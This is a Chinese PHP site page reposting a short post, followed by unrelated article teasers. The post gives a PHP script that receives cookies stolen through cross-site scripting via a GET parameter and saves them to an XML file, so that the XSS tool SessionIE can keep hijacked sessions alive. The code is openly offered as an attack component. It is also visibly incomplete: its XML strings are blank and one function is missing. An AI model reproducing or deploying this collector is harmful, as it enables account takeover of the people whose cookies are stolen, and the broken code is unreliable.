配合XSS工具SessionIE的php脚本-php手册-PHP中文網

首頁

php教程

php手册

配合XSS工具SessionIE的php脚本

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 13, 2016 am 10:22 AM

phpxss好玩工具意思我操作是的腳本這個配合

我写的这个纯粹是好玩，没啥意思，说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在我们的邮件列表发布了一个新的xss利用工具，类似老外的hamster，在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后，攻击者就可以一直保持登陆的状态。他这个工具用.net做的，为了方便，要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程序，我只有php空间，因此写了个php的作测试用。
代码:

date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET[x] ) )
{
exit;
}

$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
     if( ! file_exists( $my_file ) )
     {
         CreateXmlFile( );
     }

     AddData( $my_cookie );
}

function CreateXmlFile( )
{
     global $my_file;

     $fp = fopen( $my_file, "wb" );
     if( ! $fp )
     {
         exit;
     }

     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, "" );

     fclose( $fp );
}

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

如果您想最大限度地提高工作效率，请不要忽视这十种 AI 工具Apr 07, 2023 pm 02:39 PM

ChatGPT 之前几十年来，人工智能 (AI) 一直在改变我们的生活和工作方式。从使用 AI 驱动的虚拟助手改善我们的个人生活，到通过智能自动化彻底改变整个行业，AI 一次又一次地证明了它的价值。但在 ChatGPT 之前，AI 过去常常执行特定的小任务，很少有人认真对待它。ChatGPT 之后有了 ChatGPT，世界变得疯狂了。就那么几天之内，人们都在谈论这种令人兴奋的语言模型的强大功能。重点突然转移到基于人工智能的工具上，越来越多的人开始使用这些基于人工智能的工具，从那时起，更多工具应运

用Python写了个小工具，再复杂的文件夹，分分钟帮你整理!Apr 11, 2023 pm 08:19 PM

糟透了我承认我不是一个爱整理桌面的人，因为我觉得乱糟糟的桌面，反而容易找到文件。哈哈，可是最近桌面实在是太乱了，自己都看不下去了，几乎占满了整个屏幕。虽然一键整理桌面的软件很多，但是对于其他路径下的文件，我同样需要整理，于是我想到使用Python，完成这个需求。效果展示我一共为将文件分为9个大类，分别是图片、视频、音频、文档、压缩文件、常用格式、程序脚本、可执行程序和字体文件。# 不同文件组成的嵌套字典 file_dict = { '图片': ['jpg','png','gif','webp

Laravel中的跨站脚本攻击（XSS）和跨站请求伪造（CSRF）防护Aug 13, 2023 pm 04:43 PM

Laravel中的跨站脚本攻击（XSS）和跨站请求伪造（CSRF）防护随着互联网的发展，网络安全问题也变得越来越严峻。其中，跨站脚本攻击（Cross-SiteScripting，XSS）和跨站请求伪造（Cross-SiteRequestForgery，CSRF）是最为常见的攻击手段之一。Laravel作为一款流行的PHP开发框架，为用户提供了多种安全机

八个流行的 Python 可视化工具包，你喜欢哪个？Apr 11, 2023 pm 11:43 PM

大家好，我是Python人工智能技术喜欢用 Python 做项目的小伙伴不免会遇到这种情况：做图表时，用哪种好看又实用的可视化工具包呢？之前文章里出现过漂亮的图表时，也总有读者在后台留言问该图表时用什么工具做的。下面，作者介绍了八种在 Python 中实现的可视化工具包，其中有些包还能用在其它语言中。快来试试你喜欢哪个？用 Python 创建图形的方法有很多，但是哪种方法是最好的呢？当我们做可视化之前，要先明确一些关于图像目标的问题：你是想初步了解数据的分布情况？想展示时给人们留下深刻印象？也许

17 个可以实现高效工作与在线赚钱的 AI 工具网站Apr 11, 2023 pm 04:13 PM

自 2020 年以来，内容开发领域已经感受到人工智能工具的存在。1.Jasper AI网址：https://www.jasper.ai在可用的 AI 文案写作工具中，Jasper 作为那些寻求通过内容生成赚钱的人来讲，它是经济实惠且高效的选择之一。该工具精通短格式和长格式内容均能完成。Jasper 拥有一系列功能，包括无需切换到模板即可快速生成内容的命令、用于创建文章的高效长格式编辑器，以及包含有助于创建各种类型内容的向导的内容工作流，例如，博客文章、销售文案和重写。Jasper Chat 是该

人工智能刷脸测年龄Apr 09, 2023 pm 11:21 PM

Instagram正在测试用户验证年龄的新方法，包括由第三方公司Yoti开发的一款人工智能工具，它可以通过扫描你的脸来估计你的年龄。按照官方规定，必须年满13岁才能注册Instagram账户。但多年来，该公司几乎没有努力执行这一规定。它甚至都懒得问新用户的生日，更不用说核实这些信息了。然而，直到2019年遭到隐私和儿童安全专家的猛烈抨击之后，Instagram推出了越来越多的年龄验证功能，以及将年轻用户与成年用户区分开来的方法。目前，在青少年试图修改自己的出生日期，显示自己年满18岁时Inst

用Python下载壁纸并自动更换桌面Apr 10, 2023 pm 03:01 PM

壁纸 API我们这里使用一个开源在 GitHub 上的必应壁纸 API 作为壁纸的来源https://github.com/zenghongtu/bing-wallpaper从 readme 当中我们可以知道，在 web 应用中我只需要使用如下引用即可<img src="https://bingw.jasonzeng.dev/?w=800"/>实在是太方便了接口使用下面我们来看下该 API 的具体调用规则1、传入 resolution 参数可以指

PHP防御XSS与远程代码执行攻击的方法Jun 30, 2023 am 08:04 AM

如何使用PHP防御跨站脚本（XSS）与远程代码执行攻击引言：在当今互联网世界中，安全性成为了一个至关重要的问题。XSS（跨站脚本攻击）和远程代码执行攻击是两种最常见的安全漏洞之一。本文将探讨如何使用PHP语言来防御这两种攻击，并提供几种方法和技巧来保护网站免受这些攻击的威胁。一、了解XSS攻击XSS攻击是指攻击者通过在网站上注入恶意脚本来获取用户的个人信息、

See all articles